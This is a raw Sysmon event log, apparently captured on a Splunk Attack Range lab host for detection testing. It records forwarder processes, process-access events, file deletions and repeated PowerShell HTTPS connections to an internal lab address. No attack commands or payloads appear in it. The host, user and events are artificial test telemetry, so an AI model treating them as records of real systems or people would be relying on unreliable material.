10341000x800000000000000035344047Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:04.058{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344046Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:04.058{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344045Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:04.058{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-74D4-613B-72B4-03000000C801}6720C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035344044Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:04.058{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-74D4-613B-72B4-03000000C801}6720C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035344043Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:04.053{B81B27B7-74D4-613B-72B4-03000000C801}6720C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035344063Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:05.706{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=349067F43DC1260C24E9CFA79121A402,SHA256=4CB37C28DCF1D076431D6539ADB89CC7473A8EE8663DDC5DC1DF1D40681F5744,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035344062Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:05.059{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D088F1396D8E74E4D8BC974CC762EE08,SHA256=D4239E502D168B4CE2E456EB4A3CBD9B4218F8EDA7FFFAD8E98C740F5464E94F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035344061Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:05.058{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2BDB32CC4AB623219C77C8F6F12BB053,SHA256=7EF03F9A1CF4FF6536BD5F2174FEA8EC22DB9C6D4853665DD9C34CF07154E152,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035344064Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:06.736{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=229A5DA5C301B076265965AAF71A6D02,SHA256=21E5890CBAD18C8D3666B51CEC097E277A2D504007C0242DF46E47447408C91A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035344066Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:07.753{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A52968912564C02B78D47924DDEB25CA,SHA256=581E47BD056E67E4674529E730BF5B1269E31C408BF9F055E7E95AEA7046CA70,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035344065Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:32.061{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52631-false10.0.1.12-8000- 23542300x800000000000000035344067Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:08.772{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3E22523DD384F6DF7540B13CB1DFE61E,SHA256=03DEEBC1544B0CE1A5B120DF4E16BA783515D28E37A79961DCEDEDB9801CBD0C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035344069Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:09.786{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0FC5FDD8D99A5C94D8539F9DDB28ACEF,SHA256=6E5764AB92F88C6829B90C3C6B02B7C3A8D1B0542BE58E9729F943F093DEC020,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035344068Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:09.755{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=D7D3DE0085851FCBAE47B5F105567380,SHA256=BD1ED08980F171271C72B93D8FD7B833147D8151A7BE09F30099F54ECE85D0FA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035344071Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:10.801{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=519CEE847B33E121C9A5CAA1A5351BE8,SHA256=6E52C159F5DE54F6DB059DB1B4997BAD4EAC4FA2786B688539D933145ED4B76E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035344070Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:35.658{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52632-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035344072Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:11.802{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=66199C980BF6B02E9EAE8644343FAB64,SHA256=3F410D813CDBFD4CD8E9174E00F25AD6A419A73465F957EA6840C8B27B0E5F22,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035344073Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:12.816{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CB0672A5B79C473ED4AB83A58454D6E1,SHA256=F6EB4DB7BB461CC0B69AB3E883EDD209BE9A5A2040CCBFD24E09C892428D9ADA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035344075Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:13.832{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=80B753BED00C735E19BBEB5EE59A8D8A,SHA256=3F0EC0326A62F437F079DE165F4CEF2F7A4795E352B94E193E0C184B4F2A21C9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035344074Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:38.077{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52633-false10.0.1.12-8000- 23542300x800000000000000035344076Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:14.848{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6CE81E9340785B661C6E0968661EC4C3,SHA256=5C032DD33E619407219074C22E0E9AC8E9EDF1ED62E8AB5847C949054F29B60B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035344078Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:15.851{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DE3C9F45BCCD3069F94C4494CEB3606F,SHA256=83634B190E2C45C61AF4D42BC3FC4EF70EBAB0E5AD800F0239E5309C561F7A6D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035344077Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:15.800{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=D98BDE5FCD0C793608891C4B0D995A1E,SHA256=D3A54A8658A04EAF15F70CB8D974E3D054298253CDAD64F7CC81CAE1023E28F0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035344080Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:16.867{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A3BA95337DD846D8813FE01CDBF10828,SHA256=75C7AE50B3A3AAD8BEABB7C2D604F4A7353F5D94EFA42D8705743CDB2A2E3DE2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035344079Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:41.676{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52634-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035344091Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:17.897{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0B9286EA0E4ABCA7BAE3036AB31A7CD6,SHA256=195456DC0FCCF2E70E7A95C9960B1B6010A6D6A579A6FCF1AF63E240F16778E0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035344090Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:17.466{B81B27B7-74E1-613B-74B4-03000000C801}37686532C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x800000000000000035344089Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:43.157{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52635-false10.0.1.12-8000- 10341000x800000000000000035344088Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:17.313{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-74E1-613B-74B4-03000000C801}3768C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344087Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:17.313{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344086Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:17.313{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344085Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:17.313{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344084Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:17.313{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344083Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:17.313{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-74E1-613B-74B4-03000000C801}3768C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035344082Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:17.313{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-74E1-613B-74B4-03000000C801}3768C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035344081Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:17.299{B81B27B7-74E1-613B-74B4-03000000C801}3768C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035344102Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:18.912{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=47782A0310513B43001502A542073310,SHA256=660BB53E3506F43371C530D55ECBA557085351E1FBFF14266AAA5955316DDFCE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035344101Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:18.397{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=92553ABBA6EDBC381172D7267449D5B3,SHA256=7AC36DE71A1E0D5CF97732C224841BAC2F6A0B56C15EE7B887F84EF06ACA36BC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035344100Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:18.397{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D088F1396D8E74E4D8BC974CC762EE08,SHA256=D4239E502D168B4CE2E456EB4A3CBD9B4218F8EDA7FFFAD8E98C740F5464E94F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035344099Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:18.013{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-74E1-613B-75B4-03000000C801}6104C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344098Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 